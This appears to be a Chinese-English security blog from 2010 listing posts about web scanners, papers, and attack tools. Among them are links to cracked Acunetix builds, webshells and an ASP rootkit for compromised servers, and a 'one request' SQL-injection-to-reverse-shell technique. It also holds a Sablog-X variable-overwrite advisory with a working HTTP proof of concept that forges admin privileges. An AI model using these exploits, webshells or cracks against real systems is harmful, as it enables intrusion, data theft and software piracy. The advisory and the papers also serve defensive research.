Web安全手册

WebCruiser - Web Vulnerability Scanner V1.3.1.0306 Released

root@pcsec.org (Trace) — Sun, 07 Mar 2010 01:47:41 +0800

WebCruiser - Web Vulnerability Scanner V1.3.1.0306

Function:
* Crawler(Site Directories And Files);
* Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc.);
* POC(Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection etc.;
* GET/Post/Cookie Injection;
* SQL Server: PlainText/FieldEcho(Union)/Blind Injection;
* MySQL/Oracle/DB2/Access: FieldEcho(Union)/Blind Injection;
* Administration Entrance Search;
* Password Hash of SQL Server/MySQL/Oracle Administrator;
* Time Delay For Search Injection;
* Auto Get Cookie From Web Browser For Authentication;
* Multi-Thread;
* Adcanced:Proxy,Escape Filter;
* Report Output.

System Requirement: Windows with .Net Framework 2.0 or above

Go to Download page.

分类: Download | Tags: WebCruiser web vulnerability scanner | 添加评论(0)

Acunetix Web Vulnerability Scanner 6.5 Build 2010_02_10 Enterprise Version (2010-2-27 10:9:28)

WebCruiser - Web Vulnerability Scanner V1.0 中英文版 (2010-1-18 14:47:19)

Acunetix Web Vulnerability Scanner 6.5 Crack Build 20090917 (2009-11-23 20:38:46)

web vulnerability scanner 20090317 Crack (2009-3-18 18:42:1)

webraider

root@pcsec.org (Trace) — Sat, 27 Feb 2010 19:43:34 +0800

One Click Ownage

Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using an extra channel such as TFTP, FTP to upload the initial payload.

It's only one request therefore faster,
Simple, you don't need a tool you can do it manually by using your browser or a simple MITM proxy,
just copy paste the payload,
CSRF(able), It's possible to craft a link and carry out a CSRF attack that will give you a reverse shell
It's not fixed, you can change the payload,
It's short, Generally not more than 3.500 characters,
Doesn't require any application on the target system like FTP, TFTP or debug.exe
Easy to automate.

(source code and binaries are available)

More Detail...

分类: Download | Tags: webraider sql injection Injector | 添加评论(2)

Dirty Tricks (2010-1-25 16:25:54)

睛天电影系统注入漏洞 (2010-1-25 1:47:1)

Toolza 1.0 by Pashkela (2010-1-19 13:6:42)

Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection (2009-12-6 15:33:37)

php+mysql5半自动注入工具 (2009-9-30 14:25:23)

Acunetix Web Vulnerability Scanner 6.5 Build 2010_02_10 Enterprise Version

root@pcsec.org (Trace) — Sat, 27 Feb 2010 10:09:28 +0800

Acunetix Web Vulnerability Scanner 6.5 Build 2010_02_10 Enterprise Version:

Download Here

2010_02_10_01_webvulnscan65.exe size: 15445824 byte MD5: 4BB84128A895CD5959C1369E1BD8AE55 SHA1: 040AFAC2EE406AB6FBCF8AFBA078C34074EED933 CRC32: 0CAFEA4F

Crack Patch:

Download Here

分类: Download | Tags: Acunetix Acunetix Web Vulnerability Scanner web vulnerability scanner Enterprise Version | 添加评论(1)

WebCruiser - Web Vulnerability Scanner V1.3.1.0306 Released (2010-3-7 1:47:41)

Portable Acunetix Web Vulnerability Scanner Enterprise Edition v6.5 build 20100210 (2010-2-18 12:56:15)

WebCruiser - Web Vulnerability Scanner V1.0 中英文版 (2010-1-18 14:47:19)

Acunetix Web Vulnerability Scanner 6.5 Crack Build 20090917 (2009-11-23 20:38:46)

Acunetix Web Vulnerability Scanner v6.1.20090504 最新破解版 (2009-5-12 13:9:3)

Pass-the-hash attacks: Tools and Mitigation

root@pcsec.org (Trace) — Wed, 24 Feb 2010 11:01:56 +0800

Although pass-the-hash attacks have been around for a little over thirteen years,the knowledge of its existence is still poor.This paper tries to fill a gap in the knowledge of this attack through the testing of the freely available tools that facilitate the attack.While other papers and resources focus primarily on running the tools and sometimes comparing them, this paper offers an in-depth, systematic comparison of the tools across the various Windows platforms,including AV detection rates. It also provides exte...

Download PDF

分类: Papers | Tags: Pass the hash Mitigation hash injection | 添加评论(0)

Why Crack When You Can Pass the Hash (2009-11-4 12:43:16)

Hash injection Attacks in a Windows Network (2007-3-16 22:23:30)

Hacking Oracle from the Web

root@pcsec.org (Trace) — Tue, 23 Feb 2010 10:20:15 +0800

Exploiting SQL Injection from Web Applications

This paper discusses the exploitation techniques available for exploiting SQL Injection from web applications against the Oracle database.

Download PDF

分类: Papers | Tags: Hacking oracle | 添加评论(0)

还没有相关文章，您来说两句？

Sablog-X v2.x 任意变量覆盖漏洞

root@pcsec.org (Trace) — Thu, 18 Feb 2010 23:28:09 +0800

Sablog-X v2.x 任意变量覆盖漏洞

author: 80vul-B
team:http://www.80vul.com

一描叙：

由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞，导致可以利用extract()来覆盖任意变量，最终导致xss、sql注射、代码执行等很多严重的安全漏洞。

二分析

common.inc.php代码里：

....
$onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_COOKIE, EXTR_SKIP);
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
...
$sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']);
list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');
$sax_hash = sax_addslashes($_COOKIE['sax_hash']);
...
$seccode = $sessionexists = 0;
if ($sax_hash) {
...
if ($_EVO = $DB->fetch_array($query)){ //$_EVO初始化过程在if ($sax_hash)里，如果这个if条件不满足，将跳过这个初始化过程。
...
}
if(!$sessionexists) {
if($sax_uid) {
if(!($_EVO = $DB->fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'"))) {
...
@extract($_EVO); //覆盖任意变量

由上面的代码片断可以看到,只要使$sax_hash和$sax_uid的布尔值为fales,$_EVO就不会被赋值,而$sax_hash和$sax_uid这两个变量来自由$_COOKIE,这样我们可以很容易的控制$_EVO了,然后通过extract()来覆盖任意变量,这将导致xss、sql inj、代码执行等很多严重的安全漏洞:)

三利用

下面给个后台权限欺骗的PoC:

POST http://127.0.0.1/sax/cp.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1/sax/cp.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
Host: 127.0.0.1
Content-Length: 138
Connection: Close

_EVO[sax_uid]=1&_EVO[sax_pw]=1&_EVO[sax_logincount]=1&_EVO[sax_hash]=1&_EVO[sax_group]=1&_EVO[sax_auth_key]=1&_EVO[timestamp]=111111111111

四补丁[fix]

缺

分类: Web apps | Tags: Sablog-X 变量覆盖 | 添加评论(0)

还没有相关文章，您来说两句？

Portable Acunetix Web Vulnerability Scanner Enterprise Edition v6.5 build 20100210

root@pcsec.org (Trace) — Thu, 18 Feb 2010 12:56:15 +0800

#Trace: 今天在Pst聚合上看到一个Acunetix Web Vulnerability Scanner v6.5 build 20100210的补丁，在网上没找到安装包，问了几个人也没问到，找到一个便携版的，在vmware里试了下，可以升级。源地址被墙，已经上传到Rapidshare上。

Download Portable Acunetix Web Vulnerability Scanner Enterprise Edition v65 build 20100210：

http://rapidshare.com/files/352198683/pawvs.7z

分类: Download | Tags: Acunetix Web Vulnerability Scanner 20100210 AWVS WVS | 添加评论(3)

Acunetix Web Vulnerability Scanner 6.5 Build 2010_02_10 Enterprise Version (2010-2-27 10:9:28)

Acunetix Web Vulnerability Scanner 6.5 Crack Build 20090917 (2009-11-23 20:38:46)

Acunetix Web Vulnerability Scanner v6.1.20090504 最新破解版 (2009-5-12 13:9:3)

web vulnerability scanner 20090317 Crack (2009-3-18 18:42:1)

Acunetix Web Vulnerability Scanner 6.0 (2008-11-28 20:47:24)

NoMore AND 1=1 - Web Application Testing Tool released

root@pcsec.org (Trace) — Sun, 14 Feb 2010 16:12:29 +0800

#Trace: 等待完善

NoMore AND 1=1 is a tool that helps the Web Application Tester by
containing a large categorized list of useful expressions to inject in
his day to day duties . Those expressions come from guys like Ferruh
Mavituna, Hack.ers, etc (all credited in the sources) and personal
experience.

A standalone and a Webscarab attached version exist and can be found here:
- standalone http://wiki.eslimasec.com/esliwiki/ProjectsPost?action=AttachFile&do=get&target=Standalone_NoMore_AND_1%3D1_v04.zip
- webscarab attached:
http://wiki.eslimasec.com/esliwiki/ProjectsPost?action=AttachFile&do=get&target=Webscarab_NoMore_v0.3.zip

Screenshots, usage and more info here:
http://wiki.eslimasec.com/esliwiki/ProjectsPost

分类: Download | Tags: Web Application Testing tool | 添加评论(0)

New tool and paper for Oracle forensics (2008-11-26 16:30:16)

Microsoft Security Assessment Tool - Free for Windows (2008-11-18 22:52:50)

新型 .net 一句话及客户端 (2008-10-13 17:7:18)

Dbshell (2008-10-12 12:23:38)

Top 15 free SQL Injection Scanners (2008-7-4 1:9:19)

asprootkit

root@pcsec.org (Trace) — Sat, 13 Feb 2010 12:50:02 +0800

Author: bloodsword

是学习wmi的练手作品，专门为管理员身份下运行设计的，普通的IISUSER身份下无法正常运行。如果你提权加上了用户，却因为种种原因，暂时进不了终端什么的，可以传这个shell到服务器上，做一些猥琐的事。有的时候在shell下操作也是很方便的哦
你可能会问了，这个跟海洋的以管理员身份登陆有什么区别？海洋毕竟不是专门为这种环境设计的。而且熟悉IIS权限机制的同学都应该知道，普通的 webshell，就算用管理员身份登陆了，执行命令还是应用程序池的身份。而这个shell，无论任何操作，包括运行程序，都是以你登陆用户的身份

asprootkit.rar

分类: Download | Tags: asp asprootkit WMI bloodsword | 添加评论(1)

ASP连接任何数据库的脚本 (2010-2-2 23:43:13)

利用wsc 来做一个asp后门 (2008-12-5 16:10:38)

《WMI技术指南》中文版 PDF格式 (2008-11-19 17:52:27)

渗透中巧用IsNumeric函数 (2008-9-27 0:36:34)

ASP连接任何数据库的脚本

root@pcsec.org (Trace) — Tue, 02 Feb 2010 23:43:13 +0800

Author: 4ngel

前段时间研究DB2、SYBASE、ORACLE，某些特定情况需要ASP来连接。写了一个ASP。来连接数据库。而且还可以根据查询语句做相应输出。对于某些“商业间谍”来说。简直就是居家旅行必备。只不过效率太低了。查询几百万条的数据。那个慢啊。要是碰到多表关联的。很容易超时。所以查询之前根据语句先建立个索引。可以极大提高效率。然后再分页输出。然后再XXXXX。

本来这种小脚本是不用的。一般去服务器上就可以操作数据库了。但是还真的有一些特定情况。上不了服务器的。只能从WEB操作。没办法。在那种极端的情况下。这种小东西就诞生了。截图留点纪念。。。不过由于以前进去的服务器哪个是DB2的不记得了。所以没有截图留念。可惜了。。

Attachment

分类: Download | Tags: asp Database webshell 数据库 Oracle | 添加评论(0)

asprootkit (2010-2-13 12:50:2)

Linux下安装Metasploit破解Oracle登录用户名密码 (2009-10-20 14:12:46)

Oracle Hacking with Metasploit Videos (2009-8-3 3:39:10)

ASPXspy 2.0 (2009-7-15 10:24:26)

Orcale TNS listener support for nmap (2009-6-28 0:39:51)